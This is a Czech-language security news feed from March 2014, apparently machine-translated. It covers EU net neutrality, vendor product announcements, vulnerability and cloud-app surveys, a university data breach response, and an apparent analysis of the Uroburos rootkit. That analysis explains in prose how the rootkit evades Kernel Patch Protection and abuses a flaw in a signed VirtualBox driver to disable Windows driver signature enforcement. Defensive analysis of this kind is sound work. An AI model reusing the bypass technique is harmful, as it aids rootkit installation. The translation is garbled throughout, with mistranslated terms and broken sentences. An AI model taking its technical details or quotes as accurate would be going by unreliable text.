"Když si koupíte předplatné internetový měli byste mít přístup k veškerému obsahu, a měli byste ji dostat při rychlosti, kterou jste zaplatili za. To je to, co by mělo být otevřený internet, a všichni Evropané by měli mít přístup k němu, "uvedl místopředseda Evropské komise Neelie Kroesová k tomu zjištění, které posilují důkazy ohlášené Sdružení evropských regulačních orgánů v oblasti elektronických komunikací v roce 2012 na čisté neutrality a otevřeného internetu . "Mým cílem je chránit spotřebitele tím, že zajistí otevřený internet v celé Evropě, a tím, že jim nová práva a transparentnost, pokud jde o jejich připojení k internetu," řekla Kroesová. "Mým cílem je také chránit inovace, takže každý může inovovat na otevřeném internetu a spolu internetu bez poškození ji. To by v konečném důsledku podpořit větší konkurenci a výběr ve prospěch spotřebitelů." navrhované Připojeno Nařízení Komise Continent (MEMO / 13/779) si klade za cíl vytvoření jednotného trhu pro Internet a komunikace. Návrh je v současné době projednávána zákonodárci Evropské unie (Evropský parlament a Rada). Tento návrh by měl přinést otevřený internet pro všechny občany v Evropě a zvýšit transparentnost tím, vyžadující, aby operátoři poskytují svým zákazníkům přesné informace o rychlosti a kvalitě internetové služby, které poskytují. To by ukončily diskriminační blokování a škrcení a poskytovat účinnou ochranu otevřeného internetu. Stanoví jasná pravidla pro řízení dopravy, kterým se zakazuje takové řízení, s výjimkou mimořádných okolností. To také umožňuje poskytování "specializovaných služeb", jako high definition video služeb a služeb elektronického zdravotnictví, které podporují inovace a možnost výběru na trhu s telekomunikacemi, ale umožňuje jim způsobem, který zachovává kvalitu všeobecného přístupu k internetu. Použití tohoto přístupu, by provozovatelé nadále mohli soutěžit o spotřebitele o ceně a rozdílů v kvalitě (např. různé rychlosti internetu nebo objemy dat), aby co nejlépe vyhovovaly potřebám zákazníků.
E-mail objev ekosystém a prevence cyberthreat
8.3.2014 Hrozby | Bezpečnost
Agari oznámil Agari PRO, postavený na společnosti cloud-based SaaS datové platformy, která pomáhá společnostem zjistit, přijmout opatření, a zabránit pokročilé e-mailové hrozbách, které jsou zaměřené na koncové uživatele dnes.
Agari PRO je řešení ochrany e-mailu kanál, který poskytuje globální značky se e-mail ekosystému objev, odhalení cyberthreat a prevence, hrozby a monitorování infrastruktury a varování, a nabízí žalovatelné sanace pracovní postupy pro prevenci hrozeb. Postavený na své síti detekce v reálném čase, Agari PRO zákazníci získat okamžitý a bezprecedentní viditelnost do všech e-vysílajících domén, které jsou ve vlastnictví, oprávněnou třetí stranu, nebo škodlivé. síť Agari v real-time detekce je povoleno DMARC, s bezpečnostní normou e-mail, že je vidět rychlé přijetí, s podporou 85% schránek v USA a 60% schránek po celém světě. . DMARC umožňuje značek být pod kontrolou jejich e-mailové kanálu a definitivně sdělit přijímačů, které e-mailu je od nich a který e-mail není Klíčové vlastnosti Agari PRO zahrnují:
Detekce útoku a vizualizace: detekce v reálném čase a inteligence na hrozbách, včetně podezřelé URL a IP adres, umožňujících bezpečnostní týmy, aby přijaly okamžitá opatření
Proaktivní sanace workflow: Agari je veden workflow nabízí jasné kroky, jak vyřešit bezpečnostní problémy, nástroje a pracovní postupy pro zavádění a sledování e-mailovou ověřování v rámci infrastruktury klienta
Prevence hrozeb: S plným nasazením, e-mail hrozbách jsou zakázány, a data jsou sdílena pokusů a zmařených útoků ISP poskytnout úplný přehled
"S poslední titulky představí, že e-mail je zřejmé, že cybercriminal oblíbený cíl útoku, by mohla naše řešení nemůže být více relevantní," řekl Patrick Peterson, CEO a zakladatel společnosti Agari. "Převedením na světě e-mailových schránek do sítě detekce v reálném čase, vidíme hrozby okamžitě a sdílet data jsme analyzující - 4500000000 zpráv denně -. umožnit okamžitou akci a prevence hrozeb.
CeBIT bude ve znamení bezpečné komunikace
8.3.2014 Kongresy
První ročník veletrhu CeBIT v post-Snowdenovské éře se zaměří na bezpečnost, zejména pak na ochranu mobilních zařízení proti odposlouchávání.
Pokračující špionážní aféra americké Národní bezpečnostní agentury přispěla k tomu, že se bezpečnost stala jedním z hlavních témat letošního veletrhu CeBIT, který se již tradičně uskuteční ve dnech 10. až 14. března 2014 v německém Hannoveru. Svými produkty se příští týden hodlá na CeBITu prezentovat téměř 500 bezpečnostních firem. Seznam obsahuje taková jména jako SecuSmart, Digittrade či Datev.
Zájem o produkty SecuSmart značně vzrostl poté, co německá kancléřka Angela Merkelová začala používat ve svém BlackBerry 10 pro ochranu komunikace nástroj SecuSuite. Tato služba umožňuje šifrování hlasových hovorů i datové komunikace. Používá kartu microSD se 4GB pamětí flash pro ukládání šifrovaných dokumentů a malou čipovou kartu pro realizaci šifrování. Letos pak společnost hodlá představit celou řadu produktů pro ochranu před odposlechy.
Na CeBITu budou k vidění také různé alternativy k populárním chatovacím aplikacím typu WhatsApp. Konkrétně v případě WhatsApp se totiž poté, co se služba stala majetkem Facebooku, objevují hlasy doporučující uživatelům přechod na jinou bezpečnější aplikaci. Například Digittrade se tak hodlá pochlubit aplikací Chiffry, která nabídne šifrované zprávy i telefonování.
Obě výše zmíněné společnosti mají své kořeny v Německu a tohoto faktu hodlají využít i při propagací svých bezpečnostních novinek.
Bezpečná komunikace však není jen záležitostí šifrování. Ošetřen musí být i přístup k zařízením a aplikacím. Oblíbenou alternativou ke kódům PIN se stávají čtečky prstů nebo odemykání obrazovky pomocí určitého zaklepání, které nabízejí produkty od LG. Zcela jiný způsob pak hodlá představit společnost Datev – čtečku čipových karet, která se k uživatelským zařízením bude připojovat přes rozhraní Bluetooth. Na CeBITu chce firma technologii předvést třeba na iPadu.
Uroburos - Deeper cestování do zmírnění ochrany jádro
7.3.2014 Viry
Malware využívá novou technologii obejít ochranu jádra systému Windows '
Uroburos již byla popsána jako velmi sofistikované a vysoce komplexní malware v našem datovém červeném papíru G, kde jsme měli podívat na chování malware. Tento předpoklad je opět podporován, při pohledu na jeho instalačního procesu. Uroburos používá techniku dosud známé veřejnosti, aby se vyhnula Driver Signature Enforcement Microsoft, podstatnou část zabezpečení systému Windows ".
V první řadě bychom chtěli poslat pozdravy a díky lidé jsou aktivní na kernelmode.info fóru , zejména R136a1 a EP_X0FF. Poskytli zdatní analýzu Podpis prosazování Driver obchvatu, která obohacuje celkový pochopení věci.
Úvod
Následující článek analýza je úzce spojena s Rudou knihu G Datovy o Uroburos, zveřejněné v pátek 28 února. Papír si můžete stáhnout zde: https://www.gdata.de/rdk/dl-en-rp-Uroburos
Pro kolegy výzkumníky, zajišťujeme hash vzorku použitého pro tuto následnou článek:
SHA256: 33460a8f849550267910b7893f0867afe55a5a24452d538f796d9674e629acc4
Tento soubor je 64-bit driver, sestaven v roce 2011.
Kernel Patch Protection
Definice
Většina rootkitů používat především úpravy jádra nebo jádro záplatování, aby zakryli své činnosti a změnit chování infikovaného systému. Chcete-li chránit operační systém Windows, Microsoft přidal nové technologie k jeho 64-bit Windows verze. Technologie jádra Patch Protection (aka PatchGuard) kontroluje integritu jádra systému Windows, aby se ujistil, že žádné důležité součásti jsou modifikovány. V případě, že je zjištěn škodlivý modifikace jádra, funkce KeBugCheckEx () je vykonán, volána s argumentem s hodnotou 0x109 (CRITICAL_STRUCTURE_CORRUPTION) jako chyba kódu. Výsledkem je vypnutí systému s modrou obrazovkou.
Microsoft uvádí, že technologie, ochrana proti změnám jádra zabraňuje následující úpravy:
• měnit tabulky systémových služeb, například tím, hákování tabulky KeServiceDescriptor
• upravit přerušení Descriptor Table (IDT)
• upravit Global Descriptor Table (GDT)
Stohy • využití jádra, které nejsou přidělovány podle jádra
• náplasti jakákoliv část jádra
Uroburos zmírnění
Vývojáři Uroburos 'používá stejné vložené háčky, bylo vysvětleno v předchozím červeném papíru , aby se vyhnula Kernel Patch Protection. Cílem útočníka je háček funkci KeBugCheckEx (), aby se zabránilo manipulaci s bug kód 0x109.
Screenshot níže ukazuje fragment kódu, ve kterém je adresa KeBugCheckEx () uloženou v qword_787D8
Adresa Screenshot z KeBugCheckEx ()
Následující obrázek ukazuje, že Uroburos kontroluje, zda chyba kód rovná 0x109 V případě, že chcete získat další informace týkající se techniky používané vývojáři, doporučujeme následující odkaz:
Screenshot: Řízení hodnoty chyba kódu je
www.codeproject.com/Articles/28318/Bypassing-PatchGuard
Podpis Prosazování Driver
Definice
Rootkity jsou většinou řidiči, který používají k práci v prostoru jádra. Aby se zabránilo tento druh malware, Microsoft vytvořila Driver zásady podepisování za jeho 64-bitových verzích Windows Vista a novějších verzích. Chcete-li načíst ovladače, musí být soubor. Sys podepsané oprávněným vydavatelem.
Vývojáři mohou zakázat vynucení proces Driver Signature během vývojové fáze řidiče, což znamená, že developer nemusí podepsat každou zkompilovanou verzi ovladače během vývojové fáze. V tomto případě, stolní stroje se změní a zobrazí se následující zpráva v pravém dolním rohu: "Test Mode". Vlajka, s níž je uložen aktuální stav politiky se nazývá g_CiEnabled. Hodnota g_CiEnabled je během spouštěcí fáze systému Windows, a považován za "statické" v běhu. To znamená, že Windows předpokládá, že hodnota je nastavena správně a nemění se v průběhu běhu.
Uroburos zmírnění
Vývojáři Uroburos 'používá nové techniky pro zakázání vynucení podpisu ovladače. V našem případě se používá chybu zabezpečení v legitimně podepsané ovladače zakázat politiku! Během instalace Uroburos, ovladač Oracle VirtualBox (verze 1.6.2) je nainstalován na cílené systému. Tento ovladač (VBoxDrv.sys) je podepsáno: Následně zabezpečení v tomto ovladači (CVE-2008 - 3431) se používá k přepsání režimu jádra adresu s 0 z uživatelského prostoru (pomocí DeviceIoControl ()). V našem případě, že útočníci použili tuto chybu zabezpečení zneužít k přepsání g_CiEnabled a zakázání vynucení podpisu ovladače, zatímco systém byl spuštěn, a tím mění hodnotu od 1 (= true) na 0 (= False). Což vede k systému Windows věřit, že to běží v testovacím režimu. V testovacím režimu to není žádný velký problém načíst ovladač rootkit bez předchozího upozornění.
Screenshot: VBoxDrv.sys podpis
Závěr
Dříve jsme tvrdili, že Uroburos je velmi komplexní a velmi sofistikovaný malware, programuje kvalifikovaných lidí. Tento předpoklad je potvrzen ještě jednou podle výše uvedené analýzy Uroburos "instalační techniky.
Vývojáři museli vypořádat s prosazováním zabezpečení systému Microsoft Windows. Museli najít způsob, jak obejít technologii Kernel Patch Protection a také prosazování Driver Signature. Technika používaná k obejít ochranu proti změnám jádra byla zdokumentována na internetu, a proto není zcela nová.
Ale o uplatňování Driver Signature, je to poprvé, co jsme vidět malware using zranitelnost ve legitimně podepsaný ovladač zakázat jeho užívání je
Tento příklad ukazuje, omezení procesu podpisu. Obecně platí, že datum vypršení platnosti podpisu je nastaven na stát, několik let po datu vytvoření. V případě, že je zjištěno jakékoliv zranitelnosti, patch je k dispozici, ale starý binární je stále k dispozici a platné, v případě, že je certifikát odvolán autorem / autora podpisu a nastavit na CRL, na seznamu zneplatněných certifikátů .
Ale, zrušení podpis je pouze prvním krokem v procesu ochrany, protože každý systém, který musí zkontrolovat podpis musí mít přístup k až k dnešnímu dni CRL.
A i v případě, že je systém aktualizovaný seznam CRL, Uroburos Autoři jsou jistě myslel, že je dostatečně zručný manipulovat s ověřovací proces operačního systému je použití bez upozornění uživatele.
Tak, to je poprvé, co vidíme ty dvě techniky obejít mechanismy ochrany systému Windows "v divočině. Očekáváme, že budou používány další malware v budoucnosti, samozřejmě.
Webroot poskytuje APT ochranu pro podniky
7.3.2014 APT
Webroot oznámila vydání BrightCloud Security Services a BreachLogic Endpoint Agent, dvěma bezpečnostními nabídky cloudových, jejichž cílem je pomoci organizacím řešit prudký růst a rostoucí sofistikovanost on-line hrozeb, zejména cílených útoků jako "spearphishing" a pokročilé přetrvávající hrozby (Apts).
Při boji proti cílené útoky, jeden z hlavních otázek, podniky čelí, je neschopnost sladit neobvyklé události v jejich IT prostředí s aktuální, přesné a žalovatelné bezpečnostní inteligenci, takže je obtížné určit, zda a kde existuje hrozba. Vzhledem k tomu, malware je obvykle součástí těchto pokročilých útoků, to je také důležité, aby podniky pochopit chování aplikací běžících na svých koncových bodů, a pověst souborů, které vstupují do životního prostředí. BrightCloud Bezpečnostní služby předefinovat on-line hrozbách. Sada cloud-based služeb, poháněný vlastním učení pro analýzu ohrožení platformu, která neustále skenuje na internetu, je navržen tak, aby podnikům a technologické partnery OEM posílit jejich bezpečnostní technologii s přesným a žalovatelné hrozeb inteligence. Vylepšená sada obsahuje nový soubor Reputation Service a obohacené kontextové databázi, která koreluje dříve různorodých zabezpečení datových bodů. Tradiční, reaktivní, seznam založené zabezpečení, který pracuje tím, že uznává známých hrozeb je neschopný zastavit moderní malware, který je účel-postavený k útoku jediný cíl. BrightCloud Bezpečnostní služby používat novou inteligenci trojrozměrný ohrožení přístup k identifikaci a zastavit tyto sofistikované hrozby. Tento přístup zahrnuje:
Šířka služeb k pokrytí všech kritických zdrojů ohrožení - internet, souborů a mobilní
Cloud-based velká dat architektura v reálném čase hrozby inteligence
Větší hloubka analýzy korelace různorodá data.
Brightcloud Bezpečnostní služby zahrnují Web Reputation, webové Klasifikace, IP pověst, reputaci souborů v reálném čase, Anti-Phishing, Mobile App Reputation, Mobile Security SDK, a SecureWeb prohlížeče SDK. Jsou dodávány prostřednictvím OEM partnerů webroot - včetně mnoha předních poskytovatelů síťové bezpečnosti - pomocí jediného rozhraní API, které jim umožní chránit své zákazníky v okamžiku pravdy, kdy pokročilé kybernetické útoky se objeví uvnitř i vně svých sítí. Všechny tyto služby využívají Naprostá bezpečnost inteligence tzv. cloud-based Webroot Intelligence Network, který neustále zachycuje, analýzy, třídí a publikuje zpravodajství na URL adresy, IP adresy, mobilní aplikace a soubory, a analyzuje nejen chování, ale také koreluje vztahy renomovaným a nebezpečné webové servery, IP, soubory a mobilní aplikace prostřednictvím proprietárního srovnávací motoru. BreachLogic Endpoint Agent poskytuje stejnou cloud-based analýzy hrozeb v řešení pro zabezpečení koncových bodů příští generace pro klienty, servery a mobilní zařízení. Poskytuje včasnou detekci a blokování pokročilé útoky škodlivého softwaru a umožňuje rychlé vyšetřování a nápravu v případě porušení. Sledováním koncových aplikací, procesů a událostí před Webroot ohrožení inteligence, to uznává a zastaví se nikdy předtím neviděl hrozby, které mohou projít nekontrolovaná stávající sítě a bezpečnostních technologií koncového bodu. Navrženo integrovat do stávajícího IT prostředí, BreachLogic Endpoint Agent doplňuje síť bezpečnostní technologie a antiviry v koncových bodech, poskytuje další vrstvu ochrany proti útokům, které infiltrují nebo obejít hranice sítě. kontinuální monitoring The BreachLogic Endpoint agenta poskytuje přehled o koncových aplikací, událostí a procesů, a vztahuje se real-time chování a kontextovou analýzu z Webroot Intelligence Network identifikovat stávající narušení a zabránit budoucím útokům. Bezpečnostní týmy mohou snadno spravovat koncových upozornění s webovým Webroot konzole nebo integrovat koncových dat webroot do svého stávajícího managementu životního prostředí. BreachLogic Endpoint Agent také poskytuje podrobné údaje o soudní pomoci bezpečnostní týmy vyšetřovat zdroj a rozsah porušení identifikovat slabá místa a zabránit budoucí infiltraci.
Android, iOS řešení odhaluje dat netěsnící aplikace
7.3.2014 Mobil
Váš mobilní přístroj ví o tobě všechno. Ale jak dobře víte, že vaše mobilní zařízení? Začátek dnes, může se zdatným spotřebitelům skutečně převzít kontrolu svých osobních informací o svých zařízeních -. Instalací viaProtect z viaForensics Na rozdíl od tradičních mobilních bezpečnostních aplikací, které využívají databázi známých škodlivých aplikací na obrazovku pro viry a malware, viaProtect sleduje všechny aplikace pro mobil rizika. Například, viaProtect lze zjistit, zda aplikace zpracovává vaše osobní údaje nejistě přenosem je nešifrované, nebo na serverech umístěných v zahraničí. viaForensics odhaduje, že až 75 procent z aplikací je "děravý", nebo nejistá.
Zatímco malware a počítačové viry jsou hlavní hrozby pro PC, děravé a nezabezpečené aplikace jsou skutečná rizika osobních údajů na mobilních zařízeních. Tyto aplikace předávat informace v různých rizikových způsoby - např. bez šifrování nebo zámořských serverů, které umožňují údaje, které mají být zachyceny nežádoucími osobami. Kruté důsledky mohou zahrnovat krádež identity, finanční krádež a ztrátu soukromí. viaProtect shromažďuje mobilní soudní systém,, sítě, zabezpečení a senzorů dat ze zařízení, pak využívá statistické analýzy a ukazatele rizika odhalit podezřelé události či chování. To znamená, že aplikace je možné sledovat v reálném čase odhadnout potenciální rizika či problémy-spíše než jen kontrolu známých škodlivých aplikací. viaProtect používá skutečné analýzy čase odhalit chování, které je podezřelé a potenciálně riskantní. Uživatelé budou:
Získejte hodnocení rizik zařízení - jednoduchá skóre, které jim umožňuje vědět, zda jejich data jsou v bezpečí
Naučte se, jak telefony a tablety jsou odesílání dat - včetně toho, co data jsou odesílána nejistě
Objevte přesně tam, kde je jejich odesílání dat
Buďte informováni o rizikových úprav zařízení, včetně rozpoznání kořenů
Být upozorněni na děravé a nejistých aplikace
Kromě toho, palubní desky na bázi prohlížeče umožňuje více zařízení monitorovat z jednoho účtu -. Ideální pro rodiny s dětmi viaProtect byl také postaven od základu tak, aby podporoval oba iOS a Android platformy. Vzhledem k tomu, iOS je méně náchylné k útokům virů, to historicky bylo pod-sloužil mobilní bezpečnostní řešení. Nicméně, děravé aplikace jsou stejně běžné jako na iOS zařízeních Android, takže viaProtect nezbytný nástroj pro každé platformě. aplikace, které budou představeny v Severní Hall stánku # 2627 na konferenci RSA 2014 je zdarma pro osobní použití. Veřejné náhled lze stáhnout z Apple App Store nebo Android je Google Play Store.
Enterprise-level UTM pro domácnosti a malé kanceláře
7.3.2014 Hardware
WatchGuard Technologies oznámila, že řešení WatchGuard Firebox T10 Unified Threat Management (UTM), síťové zabezpečení zařízení, které umožňuje podnikům rozšířit výkonné zabezpečení sítě pro malé a domácí kanceláře (SOHO) prostředí.
70 procent zaměstnanců s vysokou přidanou hodnotou práce doma, alespoň jednou týdně, nové řešení umožňuje správcům sítě, aby zajistila robustní ochranu zaměstnanců, kteří jsou často spravují nejkritičtější duševního vlastnictví společností. Firebox T10 nabízí WatchGuard je cloud-based RapidDeploy schopnost, která okamžitě self-konfiguruje a začne hlásit zpět do středové konzole správce pouhým připojením přístroje. Podle nedávného globálního WatchGuard průzkumu IT odborníků, více než 82 procent umožnit zaměstnancům přístup k podnikové síti z malé kanceláři nebo Poloha domácí kancelář. Nicméně, téměř 30 procent nevyžadují bezpečnostní brány zařízení. Pro ty, kteří to pouze 23 procent vyžadují použití bezpečnostních produktů podobné těm, které používají v podnikové centrále, s funkcemi, jako je Intrusion Prevention, AntiVirus, Data Loss Prevention, kontrolu aplikací, antispam, a další. (Klikněte zde pro zobrazení kompletní SOHO bezpečnostní infographic.) V téže studii, WatchGuard také zjistil, že 56 procent cítí základní přístup VPN poskytuje potřebnou ochranu proti dnešním SOHO hrozeb. ředitel WatchGuard bezpečnostní strategie, Corey Nachreiner, říká, že přístup k VPN není kompletní zabezpečení. "Přístup k VPN již dlouho standardem pro ochranu komunikace pro zaměstnance z domova," řekl Nachreiner. "Nicméně, pokud je váš koncový bod zařízení není chráněno na stejné úrovni jako váš podnik síti VPN tunel pouze poskytuje otevřené okno do vašeho podnikání. Musíte se chránit jak a Firebox T10 navržena tak, aby, že jednoduché a nákladově efektivní . " Jak Firebox T10 valí ven na trhu, WatchGuard předpokládá malý, cenově efektivní řešení bude také apelovat na zákazníky, kteří chtějí plnou ochranu UTM pro mobilní kiosků a vozíky, takový jak ti používali v maloobchodních a zdravotnických prostředích, které se pravidelně zpracovávají kreditní karty a osobní údaje -., a musí splňovat stejné přísné PCI a dodržování standardů HIPAA jako větších kanceláří a podniků řešení přináší nejen stejné výkonné UTM možnosti jako větší modely společnosti, včetně funkčnosti RapidDeploy, ale také nabízí společnost je Nové řešení viditelnosti, WatchGuard rozměr. Tato nulová instalaci, cloud-ready nástroj poskytuje v reálném čase bezpečnostní informace, a umožňuje administrátorům mají výhled na big-data-stylu z klíčových hrozeb a použití horní webu přes celé uživatelské základny. Plus, WatchGuard UTM řešení mají plné verze best-of-breed technologií v tomto odvětví, včetně:. Antispam, antivir a filtrování URL Konečně, s Firebox T10 a plnou UTM apartmá na místě, uživatelé nebudou zažít zpoždění obvykle způsobené backhauling provoz důkladné firemní servery pro zajištění ochrany. řešení je nyní k dispozici. Ceny začínají na 395 dolarů USD (cen se může lišit v závislosti na regionu a regulace) - včetně jednoho celého roku ochrany UTM.
University of Maryland stanoví konkrétní kybernetické cíle v důsledku porušení dat
7.3.2014 KyberSecurity
Dotčeným osobám v nedávné narušení dat na University of Maryland se dostat pět namísto jednoho roku zdarma kreditní monitorování, univerzita prezident Wallace D. Loh uvedeno v další prohlášení vydaném v důsledku porušení. On také sdílel jeho plánují zahájit "komplexní, top-to-bottom vyšetřování všech výpočetních a informačních systémů." - jak centrální ty provozované univerzitou, stejně jako místních systémů provozovaných jednotlivými správními a akademických jednotek Šetřením se nejprve prohledá všechny databáze na systému zjistit, co informace, které obsahují. "Existují tisíce databází po celém areálu, před mnoha lety, kdy vytvořené prostředí pro kybernetických hrozeb byl jiný," poznamenal. závislosti na zjištěních, z nichž každá databáze bude buď odstraněna (není-li relevantní a potřebné už) nebo více plně chráněna . Za druhé, od teď na všechny univerzita systémy budou pravidelně se podrobí Penetrační testování. "Za třetí, budeme přezkoumá vhodnou rovnováhu mezi centralizovaným (University-ovládané) proti decentralizovaných (jednotka ovládané) IT systémů. Musí tu být politické změny doprovázet technické opravy, "vysvětlil. "Chápeme potřeby jednotlivých útvarů ovládat své vlastní servery a databáze. Musíme také zajistit, aby záruky na centrální a místní úrovni jsou stejně robustní a dobře koordinovaná." To vše bude provedeno podle Nově vytvořená prezidenta Task Force o kybernetické bezpečnosti, který se bude skládat z odborníků z kampusu univerzity a Maryland Cybersecurity Center. Budou pomáhal zatím nejmenované počítačové bezpečnosti společnost "s pokročilými možnostmi hacking." Revidovaná porušení FAQ sekce také nabízí velmi užitečné informace o tom, jak mohou postižení jedinci aktivovat jejich úvěrového rizika, a že je potřeba pro umístění bezpečnostní zmrazení na jejich kreditní souboru. "Státní a federální orgány činné v trestním řízení, US Secret Service, konzultanti z MITRE Corporation, a našich vlastních univerzitních pracovníků bezpečnostních IT pracují společně, aby zjistili, jak se útočníci pronikli našich více vrstev zabezpečení. Tato forenzní analýza nám umožní bránit proti tomuto typu útoku v budoucnu. bude také poskytnout vodítka k tomu, kdo byli útočníci, " vysvětlil Loh, a dodal, že "není nedobytný bariéra proti každému ďábelsky dovedné kybernetického útoku." "V dnešním digitálním světě, každý z nám musí přijmout přiměřená opatření, aby zajistil svou vlastní informační bezpečnosti. Proto se univerzita představí sérii krádeží identity seminářů pro všechny naše studenty, fakulty, zaměstnanců a absolventů. Semináře-, které budou rovněž zaznamenány a později dány k dispozici on-line budou vybaveny odborníky o tom, jak chránit své citlivé informace, "oznámil.
Programy třetích stran odpovědné za 76% chyb v populární software
7.3.2014 Incidenty | Bezpečnost
Programy třetích stran jsou zodpovědné za 76% zranitelností objevených ve 50 nejpopulárnějších programů v roce 2013, tvrdí, že výsledky ze společnosti Secunia zranitelnost Review 2014, která je založena na vzorku sedmi milionů uživatelů PSI společnosti. Zranitelnost recenze Secunia analýzy globální trendy zranitelnosti, a má mimořádně důkladný pohled na 50 nejoblíbenějších programů na soukromých počítačích - Top 50 portfoliu. Tyto 50 programy prostupují podnikové IT infrastruktury, a to buď jako integrální obchodní nástroje, které jsou schválené, sledovány a udržovány při operacích IT - pro čtenáře, například PDF a internetových prohlížečů, nebo jako aplikace na soukromých zařízení zaměstnanců a managementu, používaných na pracovišti s nebo bez povolení. V těchto 50 nejlepších programů, byly objeveny v roce 2013 celkem 1208 zranitelností. Programy třetích stran byly zodpovědné za 76% takovou zranitelnost, i když jsou tyto programy představují pouze 34% z 50 nejpopulárnějších programů o soukromých počítačů. Podíl programů (včetně operačního systému Windows 7) společnosti v Top 50 je přední 33 produktů - 66%. I tak programy Microsoft jsou zodpovědní pouze za 24% zranitelností v Top 50 programů v roce 2013. Zatímco tam je hojnost zranitelnosti, je důležité zdůraznit, že jedna chyba je všechny hackeři potřebují k porušení bezpečnosti. nedávné a neobvykle dobře zdokumentovaný příklad toho, jak jedna známá zranitelnost může způsobit katastrofu je narušení bezpečnosti v US Department of Energy v roce 2013, které vznikly náklady ve výši 1,6 milionů dolarů a vyústil v krádež osobních informací z 104.000 zaměstnanců a jejich rodin. narušení bezpečnosti v US Department of Energy byl způsoben kombinací manažerských a technologických nedostatků systému - ideální živnou půdu pro hackery, které jim umožní využívat zranitelností přítomných v infrastruktuře. Klíčové poznatky z hodnocení:
76% zranitelností ve 50 nejpopulárnějších programů na soukromých počítačích, v roce 2013 postižených programů třetích stran, zdaleka přečíslení na 8% zranitelností nalezených v operačních systémech nebo 16% zranitelností objevených v programech Microsoft. roce 2012, byla tato čísla 86% (non-Microsoft), 5,5% (operační systémy) a 8,5% (Microsoft).
V 1208 zranitelnosti byly objeveny v 27 výrobků na Top 50 portfoliu.
17. Produkty třetích stran, které představují pouze 34% produktů jsou zodpovědné za 76% zranitelností objevených v Top 50 let. Ze 17 programů třetích stran, 10 byli zranitelní. Z 33 programů společnosti Microsoft v Top 50, 17 byly zranitelné.
Programy společnosti Microsoft (včetně operačního systému Windows 7) tvoří 66% výrobků v Top 50, ale byl odpovědný pouze za 24% zranitelností.
Během pětiletého období, podíl třetích stran zranitelnosti se pohybuje kolem 75% - v roce 2013 to bylo 76%.
Celkový počet zranitelných míst v Top 50 nejpopulárnějších programů byl 1208 v roce 2013, ukazuje nárůst o 45% na 5 roků trendu. Většina z nich byly hodnoceny podle Secunia buď jako "vysoce kritické" (68,2%) nebo "velmi kritické" (7,3%).
V roce 2013, 2289 zranitelné produkty byly objeveny s celkem 13073 chyb v nich.
86% zranitelností v Top 50 měla záplaty jsou k dispozici v den zveřejnění v roce 2013, tedy výkon na opravu koncových bodů je v rukou všech koncových uživatelů a organizací.
79% zranitelností ve všech produktů měla záplaty jsou k dispozici v den zveřejnění v roce 2013.
V roce 2013, 727 zranitelnosti byly objeveny v 5 nejpopulárnějších prohlížečů: Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari.
V roce 2013, 70 zranitelnosti byly objeveny v 5 nejoblíbenějších čtenářů PDF: Adobe Reader, Foxit Reader, PDF-XChange Viewer, Sumatra PDF a Nitro PDF Reader.
"To je jedna věc, že programy třetích stran jsou zodpovědné za většinu slabých míst na typické PC, spíše než programy společnosti Microsoft. Nicméně, další velmi důležitý bezpečnostní faktor je, jak snadné je aktualizovat programy společnosti Microsoft v porovnání s programy třetích stran. Docela jednoduše, automatizace se kterou se aktualizace zabezpečení společnosti Microsoft jsou k dispozici koncovým uživatelům - prostřednictvím automatické aktualizace, systém řízení konfigurace a aktualizace služeb - zajišťuje, že se jedná o poměrně jednoduchý úkol k ochraně soukromých počítačů a firemní infrastruktury před zranitelností objevených Microsoft produkty. To není tak s velkým počtem třetích stran dodavatelů, z nichž mnozí nemají buď schopnosti, zdroje nebo bezpečnostní zaměření, jak vydělat aktualizace zabezpečení automaticky a snadno dostupné, "řekl technický ředitel firmy Secunia, Morten R. Stengaard.
44% firem nemají mrak app politiku v místě
7.3.2014 Bezpečnost
Po rozhovorech s 120 RSA konference účastníků, Netskope oznámila výsledky průzkumu o používání informací o zabezpečení profesionálů cloudových aplikací.
Netskope zjistil, že navzdory rozšířenému přijetí cloudových aplikací v podniku, většina bezpečnostních IT odborníci jsou buď neví, cloud app politice své firmy, nebo nemáte. V nepřítomnosti app politiky cloud, více než dvě třetiny účastníků průzkumu uvedlo, že by za zásady ochrany osobních údajů jejich společnosti před stažením aplikace. Jak cloud aplikace množí v podniku, rizika pro bezpečnost a soukromí spojené s používáním těchto aplikací při práci je na vzestupu. Podle nedávného Netskope Cloud zprávy, typický podnik používá 397 aplikací, nebo stejně jako 10 násobek čísla, která typicky má v rámci své kompetence. Navíc, 77 procent z cloudových aplikací nejsou enterprise-ready, takže IT s výzvou zajištění těchto aplikací a uvedení politiky v místě, které řídí jejich použití. průzkum - který poskytuje přehled o uživatele a firemních postupů mezi vzorkem RSA účastníků - nabídl se tyto závěry: Politiky zpoždění i přes rostoucí cloud app přijetí v podniku, když podniky mají více cloudových aplikací v použití zaměstnanců, než kdy předtím, 44 procent dotázaných uvedlo, že jejich firma nemá app politiku mrak na místě. Navíc, 17 procent zaměstnanců si neuvědomuje, pokud jejich firma má politiku. Zaměstnanci chtít, aby zvážila firemní politiku před použitím cloud aplikace Navzdory vzestupu neschválených cloudových aplikací v podniku, také volal "Stín IT," většina respondentů se do pozornost jejich společnost Zásady ochrany osobních údajů před podpisem na app účtu cloud. Sedmdesát procent dotázaných uvedlo, že považují pravidla před procházení nebo bít App Store, což je dobrá zpráva pro firmy, které mají politiky na svém místě. Skladovací a spotřební aplikace jsou vnímány jako IT ne-ne to Když ptal se na vrcholu aplikací, které nemají Chcete-IT vědět, respondentů uvedlo, že skladování a spotřebitelské aplikace jsou top mysli. První tři aplikace, které chtějí, aby se mimo IT je radar jsou: 1. Dropbox (Storage) 2. Twitter (spotřebitele) 3. Facebook (spotřebitele) "To není překvapující, že i když použití cloud app se dovtípil v podniku, většina firem jsou za o zřízení jasné zásady a pokyny, a jako zaměstnanci výsledek jsou ve tmě o důsledcích jejich aplikace využití, "řekl Sanjay Beri, zakladatel a CEO, Netskope. "Díky úžasné výhody, které halí aplikace přinášejí, podniky také nést významná rizika, která již nemůže být ignorována. Očekáváme, že analytics cloud app a provádění politik stala prioritou v příštích měsících jako podniky hledat optimalizovat jejich využití cloudových aplikací s okem na obou agility a bezpečnosti. "
Detekce hrozeb pro vzdálené uživatele by OPSWAT
7.3.2014 ochrany
OPSWAT oznámila oficiální vydání ZAŘÍZENÍ, cloud-based síťovou platformu pro správu zabezpečení, která nabízí pokročilou detekci hrozeb pro vzdálené uživatele prostřednictvím identifikace potenciálních hrozeb, že stávající antivirový software může mít zmeškané nebo nemůže napravovat.
